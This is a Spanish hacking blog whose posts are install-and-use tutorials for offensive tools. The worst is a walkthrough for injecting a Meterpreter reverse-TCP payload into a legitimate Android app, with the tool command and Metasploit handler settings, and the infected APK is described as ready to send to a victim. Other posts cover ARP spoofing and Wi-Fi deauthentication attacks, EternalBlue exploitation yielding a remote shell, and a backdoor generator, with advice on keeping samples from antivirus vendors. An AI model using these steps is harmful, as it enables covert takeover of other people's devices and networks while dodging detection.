Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

lunes, 1 de enero de 2018

NETATTACK2 (Escaneando y Atacando Redes)

NETATTACK2


Que es ?

NETATTACK2 es un script escrito en python que puede escanear y atacar redes. Está basado en GUI que lo hace fácil de entender.

Que hace ?


EXPLORACIÓN
Escanee su red en busca de hosts activos, su sistema operativo, puertos abiertos y mucho más.
Busque puntos de acceso y descubra el tipo de encriptación, WPS y otros datos útiles.

SPOOFING / SNIFFING
Simple ARP Spoofing
DNS Sniffing by ARP Spoofing el objetivo y escuchando DNS-Queries

SACAR
Patear hosts de su internet usando ARP-Spoof attack

DEAUTHING
Enviar paquetes de desauthentication a puntos de acceso en su área (DoS)
Deauth-All, básicamente hace lo mismo pero escanea redes y las ataca periódicamente

INSTALACIÓN
Lo primero es clonar el repositorio lo hacemos de la siguiente manera:  Netattack2 abrimos una nueva terminal y tecleamos los siguiente git clone https://github.com/chrizator/netattack2.git


Luego entramos a la carpeta y le damos permisos de la siguiente forma chmod +x  netattack2.py
  


Quedará de la siguiente forma cuando ya no tenga el color verde  ya tiene los permisos es decir podemos ejecutarlo.


Lo iniciaremos de la siguiente forma ./netattack2.py y nos dirá que si queremos instalar todos los requerimientos le decimos que si.




Esperamos hasta que descargue todos los complementos necesarios para poder ejecutar sin problemas la herramienta, cuando ya termine todo hacemos nuevamente esto: ./netattack2.py  y ya podemos usar la herramienta.


Nota: si les da problemas cuando estén instalando los complementos, en una ventana nueva  teclear lo siguiente y con esto ya corregirán error y vuelven a ejecutar sin problema la herramienta. apt --fix-broken install




Feliz Año


domingo, 11 de junio de 2017

Kwetza Infectar Aplicaciones Android

6/11/2017 11:17:00 p. m. Posted by Secpronet No hay comentarios

Kwetza Infectar Aplicaciones Android


¿Qué hace?

Kwetza infecta una aplicación para Android existente con cualquiera de las plantillas de encargo o de carga útil por defecto para evitar ser detectados por los antivirus. Kwetza le permite infectar aplicaciones Android usando permisos predeterminados de la aplicación de destino o se inyecta permisos adicionales para obtener una funcionalidad adicional.

¿Cómo se instala?

Primero colonas o descargamos la herramienta. https://github.com/sensepost/kwetza.git una vez clonada la herramienta procederemos a instalarla.

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar utilizando Pip:

pip install beautifulsoup4

Cabe mencionar que la herramienta necesita apktool para su funcionamiento, lo aremos de la siguiente forma. vamos a la pagina para descargarlo apktool una vez descargada la última versión  procedemos a descargar el siguiente archivo link lo guardamos como .txt "apktool.txt" el archivo .jar descargado lo remombraremos y le pondremos apktool.jar 



una  vez hecho esto lo copiamos a la siguiente ruta: /usr/local/bin luego daremos permisos a ambos archivos. 


una vez hecho todo esto procedemos a ejecutar la herramienta abrimos una terminal y desde donde la clonamos o descargamos tecleamos lo siguiente. el comando para lanzar la aplicación es la siguiente:
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no 
solo sustituiremos valores de la siguiente forma: python kwetza.py ccleaner.apk 192.168.1.10 4444 yes ccleaner es la aplicación que yo elegí mi ip y el puerto a la escucha el "si " es para darle permisos adicionales a la aplicación final.


una vez hecho esto esperamos que la aplicación haga su trabajo hasta que te llegue hasta la siguiente linea Passphrase for keystore: la contraseña por defecto es "password".


una vez terminado el proceso ya tendremos la aplicación lista para mandársela a la victima  "recuerden  esto es con fines educativos" la aplicación se guardara en la siguiente ruta: 
/root/Herramientas/kwetza/ccleaner/dist/ccleaner.apk "allí fue donde yo la instale y la aplicación que use" esto variara dependiendo de donde la guardaron. 



ya realizado todo esto procedemos a configurar Metasploit, 

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10 "nuestra ip" 
set lport 4444  "el que usamos para configurar la apk"


una vez hecho esto pues ponemos a la escucha nuestro payload  por tener la sesión exitosa. Como vemos tenemos una sesión de meterpreter exitosa.



ya con esto que vuele nuestra mente recuerden es con fines educativos.






viernes, 26 de mayo de 2017

vscan herramienta de escáner de vulnerabilidades

5/26/2017 09:03:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
(VSCAN) 
Herramienta de escáner de vulnerabilidades es el uso de scripts nmap y NSE para encontrar vulnerabilidades.
Que es:  
Esta herramienta pone un valor adicional en el análisis de vulnerabilidades con nmap. Utiliza los scripts NSE que pueden añadir flexibilidad en términos de detección y explotación de la vulnerabilidad. A continuación hay algunas de las características que proporcionan los scripts NSE  
  • Detección de redes  
  • Más sofisticada detección de versión  
  • detección de vulnerabilidades  
  • la detección de puerta trasera  
  • la explotación de la vulnerabilidad 
La herramienta realiza la siguiente:
  • comprobar la comunicación a los hosts de destino por cheking peticiones ICMP 
  • toma como entrada un nombre de protocolo, como http y ejecuta todos los scripts NSE relacionados con ese protocolo 
  • si alguna vulnerabilidad provoca que guarda el resultado en un archivo de registro 
  • puede realizar todas las acciones anteriores para un rango de direcciones IP 

Instalación:

Lo primero clonaremos el repositorio:  https://github.com/xvass/vscan


lo siguiente sera darle permiso ejecutaremos el siguiente comando andentro de la acarpeta vscan: chmod +x 


ya por ultimo lo ejecutamos.

Como se usa: 

[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)> 
[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)> 
[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

Ejemplo: 

./vscan.sh 192.168.1..1  port 80



Si la herramienta encuentra un vulnerabilidad en un determinado protocolo Mantiene la salida en un archivo de registro que se crean y se guardan en la siguiente ubicación. 
("/home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt")

espero les sea útil....

miércoles, 24 de mayo de 2017

Explotando la vulnerabilidad EternalBlue MS17-010


Explotando vulnerabilidad EternalBlue MS17-010


Afecta a :

Microsoft Windows Windows 8/2012 R2 (x64)

Nombre del módulo:

Exploit / ventanas / SMB / ms17_010_eternalblue

vamos a explotar: 
Entramos a metasploit y buscamos el módulo a usar.
use  Exploit / ventanas / SMB / ms17_010_eternalblue

Luego de esto veremos las opciones y las configuraremos. (como vemos lo único que modificaremos es el rhost lo demás lo dejamos así )
 
procedemos a lanzar el exploit

como vemos obtuvimos una shell remota ahora todo queda a nuestra iamaginación.


 

domingo, 14 de mayo de 2017

Como Instalar FatRat (Generador de Backdoor)

5/14/2017 09:27:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
FatRat
Que es:

Una herramienta fácil para generar backdoor y herramienta fácil de post ataque de explotación como el ataque del navegador, dll. Esta herramienta compila un malware con la carga útil popular y luego el malware compilado se puede ejecutar en windows, android, mac. El malware que se creó con esta herramienta también tiene la capacidad de omitir la mayoría de la protección de software AV.


Como se instala:

Lo primero que vamos hacer es clonar el repositorio desde github
https://github.com/Screetsec/TheFatRat.git 


luego de clonar el repositorio vamos a instalarlo pero para ello hay que darle permisos al setup. lo hacemos de la siguiente manera: chmod +x setup.sh 


Luego de los permisos procedemos con la instalación, ejecutamos lo siguiente: ./setup.sh  (en caso de no tener instalado un complemento el mismo setup lo descarga e instala.)




Una vez finalizado aparecera esto.


Ejecutandolo:

para poder usarlo tenemos que darle permiso a dos archivos de la siguiente forma tecleamos esto:  chmod +x fatrat  chmod +x powerfull.sh

 
  ya cono esto si lo ejecutamos de la siguiente manera: ./fatrat 


Nota: si quieres verificar el backdoor no subir a VIRUSTOTAL ya que las firmas son enviadas a las compañias de AV  subirlo a http://www.nodistribute.com/  es lo unico que piden los desarrolladores.



ahora si por fin ya lo pueden usar.





miércoles, 10 de mayo de 2017

Como Usar Hash Identifier

5/10/2017 10:03:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Hash Identifier

Que es:

Software para identificar los diferentes tipos de hashes utilizados para cifrar datos y especialmente contraseñas.

Algoritmos de encriptación que identifica son:
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • MD2
  • MD4
  • MD5
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • y muchos mas.
 Como se usa:

Por defecto ya viene incorporado en Kali Linux.

Para utilizarlo nos vamos a la parte herramientas y nos dirigimos a donde dice passwords allí buscamos Hash Identifier nos aparecera esto.





Ahora lo que tenemos que hacer es colocar el hash y dejar que la herramienta haga su trabajo.


y nos mostrará las posibles encriptaciones

 




  

domingo, 7 de mayo de 2017

Como instalar John The Ripper

5/07/2017 07:38:00 p. m. Posted by Secpronet , , , , , 8 comments
John The Ripper



Definición:
Es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.


 Instalación:

abrir una terminal y copiar

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz


Descomprimir

tar -xzvf john-1.8.0.tar.gz




entrar a la siguiente ruta o a donde lo instalaron copian y pegan
cd john-1.8.0/src/ 
make clean generic



por ultimo hacemos el test


ya lo podemos usar